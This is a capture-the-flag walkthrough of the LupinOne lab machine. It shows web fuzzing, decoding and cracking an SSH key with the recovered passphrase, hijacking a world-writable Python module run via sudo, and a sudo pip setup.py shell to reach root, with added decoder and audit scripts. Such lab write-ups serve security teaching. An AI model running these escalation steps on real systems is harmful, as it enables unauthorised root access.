EmpireLupinOne
Information gathering
Nmap
└─# nmap -sV -A 192.168.25.134
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-27 00:14 EDT
Nmap scan report for 192.168.25.134
Host is up (0.00024s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 ed:ea:d9:d3:af:19:9c:8e:4e:0f:31:db:f2:5d:12:79 (RSA)
| 256 bf:9f:a9:93:c5:87:21:a3:6b:6f:9e:e6:87:61:f5:19 (ECDSA)
|_ 256 ac:18:ec:cc:35:c0:51:f5:6f:47:74:c3:01:95:b4:0f (ED25519)
80/tcp open http Apache httpd 2.4.48 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/~myfiles
|_http-server-header: Apache/2.4.48 (Debian)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:9A:2D:7D (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.24 ms 192.168.25.134
Gobuster
===============================================================
2023/06/27 00:15:30 Starting gobuster in directory enumeration mode
===============================================================
//robots.txt (Status: 200) [Size: 34]
//index.html (Status: 200) [Size: 333]
//manual (Status: 301) [Size: 317] [--> http://192.168.25.134/manual/]
//image (Status: 301) [Size: 316] [--> http://192.168.25.134/image/]
//server-status (Status: 403) [Size: 279]
[ERROR] 2023/06/27 00:15:31 [!] parse "http://192.168.25.134//database/%": invalid URL escape "%"
//image/ (Status: 200) [Size: 953]
//manual/ (Status: 200) [Size: 676]
===============================================================
2023/06/27 00:16:05 Starting gobuster in directory enumeration mode
===============================================================
/robots.txt (Status: 200) [Size: 34]
/.htpasswd (Status: 403) [Size: 279]
/.htaccess (Status: 403) [Size: 279]
/.htpasswds (Status: 403) [Size: 279]
Progress: 6952 / 10289 (67.57%)
===============================================================
2023/06/27 00:16:06 Finished
===============================================================
Manual verification of the ports and collation of the findings
80
The home page has nothing of interest, so we move on to robots.txt, which gives a hint:
User-agent: *
Disallow: /~myfiles
Requesting that directory returns Error 404. On Apache a path of the form /~name is handled by mod_userdir and maps to a per-user directory (by default ~name/public_html), so other names in the same form are worth looking for. Fuzzing the path with wfuzz turns up the ~secret directory:
┌──(root㉿kali)-[~]
└─# wfuzz -c -z file,/usr/share/wordlists/wfuzz/general/common.txt --hc 403,404 http://192.168.25.134/~FUZZ
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.25.134/~FUZZ
Total requests: 951
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000718: 301 9 L 28 W 318 Ch "secret"
Total time: 0
Processed Requests: 951
Filtered Requests: 950
Requests/sec.: 0
Visiting that page, we are told that an SSH key file is hidden here for us to find, and that the user name is icex64:
Hello Friend, Im happy that you found my secret diretory, I created like this to share with you my create ssh private key file,
Its hided somewhere here, so that hackers dont find it and crack my passphrase with fasttrack.
I'm smart I know that.
Any problem let me know
Your best friend icex64
Next we search the same path for hidden files and find .mysecret.txt. The first thirteen hits below are the wordlist's comment lines: the leading # turns the rest of the payload into a URL fragment, so they all fetch the same 331-character page and can be hidden with --hh 331. The 4689-character hit for mysecret is the real one.
└─# wfuzz -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hc 404,403 -u http://192.168.25.134/~secret/.FUZZ.txt
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.25.134/~secret/.FUZZ.txt
Total requests: 220560
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000001: 200 5 L 54 W 331 Ch "# directory-list-2.3-medium.txt"
000000007: 200 5 L 54 W 331 Ch "# license, visit http://creativecommons.org/licenses/by-sa/3.0/"
000000003: 200 5 L 54 W 331 Ch "# Copyright 2007 James Fisher"
000000013: 200 5 L 54 W 331 Ch "#"
000000005: 200 5 L 54 W 331 Ch "# This work is licensed under the Creative Commons"
000000009: 200 5 L 54 W 331 Ch "# Suite 300, San Francisco, California, 94105, USA."
000000004: 200 5 L 54 W 331 Ch "#"
000000011: 200 5 L 54 W 331 Ch "# Priority ordered case sensative list, where entries were found"
000000006: 200 5 L 54 W 331 Ch "# Attribution-Share Alike 3.0 License. To view a copy of this"
000000002: 200 5 L 54 W 331 Ch "#"
000000012: 200 5 L 54 W 331 Ch "# on atleast 2 different hosts"
000000008: 200 5 L 54 W 331 Ch "# or send a letter to Creative Commons, 171 Second Street,"
000000010: 200 5 L 54 W 331 Ch "#"
000073703: 200 1 L 1 W 4689 Ch "mysecret"
Total time: 0
Processed Requests: 220560
Filtered Requests: 220546
Requests/sec.: 0
Requesting it returns:
cGxD6KNZQddY6iCsSuqPzUdqSx4F5ohDYnArU3kw5dmvTURqcaTrncHC3NLKBqFM2ywrNbRTW3eTpUvEz9qFuBnyhAK8TWu9cFxLoscWUrc4rLcRafiVvxPRpP692Bw5bshu6ZZpixzJWvNZhPEoQoJRx7jUnupsEhcCgjuXD7BN1TMZGL2nUxcDQwahUC...
The blob uses only the Base58 alphabet (no 0, O, I, l and no = padding), and decoding it as Base58 gives an OpenSSH private key:
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jYmMAAAAGYmNyeXB0AAAAGAAAABDy33c2Fp
PBYANne4oz3usGAAAAEAAAAAEAAAIXAAAAB3NzaC1yc2EAAAADAQABAAACAQDBzHjzJcvk
9GXiytplgT9z/mP91NqOU9QoAwop5JNxhEfm/j5KQmdj/JB7sQ1hBotONvqaAdmsK+OYL9
H6NSb0jMbMc4soFrBinoLEkx894B/PqUTODesMEV/aK22UKegdwlJ9Arf+1Y48V86gkzS6
...
-----END OPENSSH PRIVATE KEY-----
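The decoding step above was done with a decoder tool; the following is an added example, not code from the original writeup, that re-implements the same Base58 transform so the step can be checked offline and so a wrong guess about the encoding fails loudly. It assumes the Bitcoin/IPFS Base58 alphabet (the default in CyberChef), and the PEM block it encodes as a sample is constructed here because the real blob on the page is truncated.

```python
"""Base58 decoding for the .mysecret.txt blob (added example for this page)."""

ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
_INDEX = {c: i for i, c in enumerate(ALPHABET)}


def b58decode(text: str) -> bytes:
    """Decode Base58 text to bytes.  Leading '1' characters encode leading
    zero bytes, so they are counted separately from the big-integer part."""
    text = "".join(text.split())          # tolerate wrapped or pasted input
    if not text:
        return b""
    value = 0
    for ch in text:
        if ch not in _INDEX:
            raise ValueError(f"not a Base58 character: {ch!r}")
        value = value * 58 + _INDEX[ch]
    leading_ones = len(text) - len(text.lstrip("1"))
    body = value.to_bytes((value.bit_length() + 7) // 8, "big") if value else b""
    return b"\x00" * leading_ones + body


def b58encode(data: bytes) -> str:
    """Inverse of b58decode; used here to build a known-good sample input."""
    value = int.from_bytes(data, "big")
    out = ""
    while value:
        value, rem = divmod(value, 58)
        out = ALPHABET[rem] + out
    leading_zeros = len(data) - len(data.lstrip(b"\x00"))
    return "1" * leading_zeros + out


def looks_like_base58(text: str) -> bool:
    """Quick triage: Base58 deliberately omits 0, O, I and l and has no
    '=' padding, which is what separates it from Base64 at a glance."""
    text = "".join(text.split())
    return bool(text) and all(ch in _INDEX for ch in text)


def decode_private_key(text: str) -> str:
    """Decode a blob and insist that the result is an OpenSSH PEM block,
    so a wrong encoding guess raises instead of producing garbage."""
    raw = b58decode(text)
    if not raw.startswith(b"-----BEGIN OPENSSH PRIVATE KEY-----"):
        raise ValueError("decoded data is not an OpenSSH private key")
    return raw.decode("ascii")


# Constructed sample (the blob on the page is truncated): a stand-in PEM
# block is encoded here purely to exercise the round trip.
SAMPLE_KEY = (
    "-----BEGIN OPENSSH PRIVATE KEY-----\n"
    "b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jYmMAAAAGYmNyeXB0AAAAGAAAABDy33c2Fp\n"
    "-----END OPENSSH PRIVATE KEY-----\n"
)
SAMPLE_BLOB = b58encode(SAMPLE_KEY.encode())

if __name__ == "__main__":
    print(decode_private_key(SAMPLE_BLOB))
```

Paste the real blob into decode_private_key() in place of SAMPLE_BLOB; the whitespace stripping means a wrapped copy from the browser is fine, and the header check catches the common mistake of decoding as Base64 first.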
shell
Save the private key in a local file named key and crack its passphrase with john. The note above mentions fasttrack, so that wordlist is the obvious first choice; it recovers the passphrase P@55w0rd!, which we use to log in.
┌──(root㉿kali)-[/home/kali/Desktop]
└─# python2 /usr/share/john/ssh2john.py key > keyhash
john keyhash --wordlist=/usr/share/wordlists/fasttrack.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
P@55w0rd! (key)
1g 0:00:00:01 DONE (2023-06-27 05:04) 0.5780g/s 36.99p/s 36.99c/s 36.99C/s Winter2015..password2
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Horizontal privilege escalation
Set the permissions of key to 600 (ssh refuses a private key that other users can read), then connect as icex64 and read user.txt:
chmod 600 key
ssh icex64@192.168.25.134 -i key
3mp!r3{I_See_That_You_Manage_To_Get_My_Bunny}
First we check what this user may run with sudo: a single Python script, executed as arsene.
icex64@LupinOne:~$ sudo -l
Matching Defaults entries for icex64 on LupinOne:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User icex64 may run the following commands on LupinOne:
(arsene) NOPASSWD: /usr/bin/python3.9 /home/arsene/heist.py
The script imports the webbrowser module. If that module's file in the Python library directory is writable, we can change it to hand us a shell. find locates the file, and its permissions show it is world-writable:
icex64@LupinOne:~$ find /usr/ -name '*webbrowser*'
/usr/lib/python3.9/webbrowser.py
/usr/lib/python3.9/__pycache__/webbrowser.cpython-39.pyc
icex64@LupinOne:~$ ls -l /usr/lib/python3.9/webbrowser.py
-rwxrwxrwx 1 root root 24087 Oct 4 2021 /usr/lib/python3.9/webbrowser.py
We can edit that file directly and add a reverse shell, or simply a call to a shell, at module level: the import runs it before heist.py reaches its own code. Running the permitted sudo command then gives a shell as arsene:
icex64@LupinOne:~$ vi /usr/lib/python3.9/webbrowser.py
icex64@LupinOne:~$ sudo -u arsene /usr/bin/python3.9 /home/arsene/heist.py
arsene@LupinOne:/home/icex64$ whoami
arsene
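The check performed by hand above (which module does the sudo-run script import, where does Python load it from, and can we write to it) generalises to any rule of the form "run interpreter X on script Y as another user". The following is an added example written for this page, not code from the box or the original writeup: it parses the target script's imports, resolves each one the way Python would at run time (the script's own directory first), and flags module files whose mode bits grant write access to group or others. It checks mode bits rather than os.access() so the answer does not change depending on who runs it. The demo tree it builds is constructed here as a stand-in for /home/arsene; the module and file names in it are hypothetical.

```python
"""Audit which imports of a sudo-run Python script a non-owner could edit
(added example for this page, not part of the original writeup)."""
import ast
import importlib.util
import os
import stat
import sys
import tempfile
from typing import Dict, List, Optional


def imported_names(script_path: str) -> List[str]:
    """Top-level module names pulled in by `import x` / `from x import y`."""
    with open(script_path, "r", encoding="utf-8") as fh:
        tree = ast.parse(fh.read(), filename=script_path)
    names = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for alias in node.names:
                names.add(alias.name.split(".")[0])
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names.add(node.module.split(".")[0])
    return sorted(names)


def resolve_module_file(name: str, script_dir: str) -> Optional[str]:
    """File Python would load for `name` when the script runs.  The script's
    own directory is sys.path[0] at run time, so it is emulated here."""
    sys.path.insert(0, script_dir)
    try:
        spec = importlib.util.find_spec(name)
    except (ImportError, ValueError):
        spec = None
    finally:
        sys.path.pop(0)
    if spec is None or not spec.has_location or spec.origin is None:
        return None  # built-in or frozen module: nothing on disk to edit
    return spec.origin


def loosely_writable(path: str) -> bool:
    """True when the file's mode grants write access to group or others."""
    return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def writable_imports(script_path: str) -> Dict[str, str]:
    """Map module name -> file for every import that a non-owner could edit.
    The script itself is reported under the key "<script>" if it is loose."""
    script_path = os.path.abspath(script_path)
    script_dir = os.path.dirname(script_path)
    findings: Dict[str, str] = {}
    for name in imported_names(script_path):
        path = resolve_module_file(name, script_dir)
        if path and os.path.isfile(path) and loosely_writable(path):
            findings[name] = path
    if loosely_writable(script_path):
        findings["<script>"] = script_path
    return findings


def build_demo() -> str:
    """Constructed stand-in for /home/arsene: a script importing the real
    webbrowser module plus two hypothetical local helpers, one of them left
    world-writable the way webbrowser.py was on the box.  Returns the script
    path."""
    d = tempfile.mkdtemp(prefix="heist_demo_")
    loose = os.path.join(d, "heist_loose_helper.py")
    tight = os.path.join(d, "heist_tight_helper.py")
    script = os.path.join(d, "heist.py")
    with open(loose, "w") as fh:
        fh.write("def run():\n    return 'loose'\n")
    with open(tight, "w") as fh:
        fh.write("VALUE = 1\n")
    with open(script, "w") as fh:
        fh.write("import webbrowser\nimport heist_loose_helper\n"
                 "from heist_tight_helper import VALUE\n")
    os.chmod(loose, 0o666)   # -rw-rw-rw-, like /usr/lib/python3.9/webbrowser.py
    os.chmod(tight, 0o644)
    os.chmod(script, 0o644)
    return script


if __name__ == "__main__":
    # Usage: audit_imports.py /home/arsene/heist.py   (no argument: demo tree)
    target = sys.argv[1] if len(sys.argv) > 1 else build_demo()
    for name, path in writable_imports(target).items():
        print(f"{name:24s} {path}")
```

Run it as the low-privileged user against the script named in the sudo rule. A hit on a module file means the same trick as above applies; a writable containing directory would also allow replacing the file, so check that separately when the audit comes back empty.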
Privilege escalation
As arsene, sudo -l shows that /usr/bin/pip can be run as root without a password:
arsene@LupinOne:/home/icex64$ sudo -l
Matching Defaults entries for arsene on LupinOne:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User arsene may run the following commands on LupinOne:
(root) NOPASSWD: /usr/bin/pip
In arsene's home directory, create a setup.py containing the Python we want to run (a reverse shell, or as here a direct shell), then have pip install . execute it as root. Note that the $(tty) substitutions are expanded by our own shell when the echo runs, so the saved file contains the literal path of our terminal device, which is what lets the spawned sh attach to it.
arsene@LupinOne:~$ echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > setup.py
arsene@LupinOne:~$ sudo pip install .
Processing /home/arsene
# ls
heist.py note.txt setup.py
# cd
# pwd
/root
# ls
root.txt
# cat root.txt
3mp!r3{congratulations_you_manage_to_pwn_the_lupin1_box}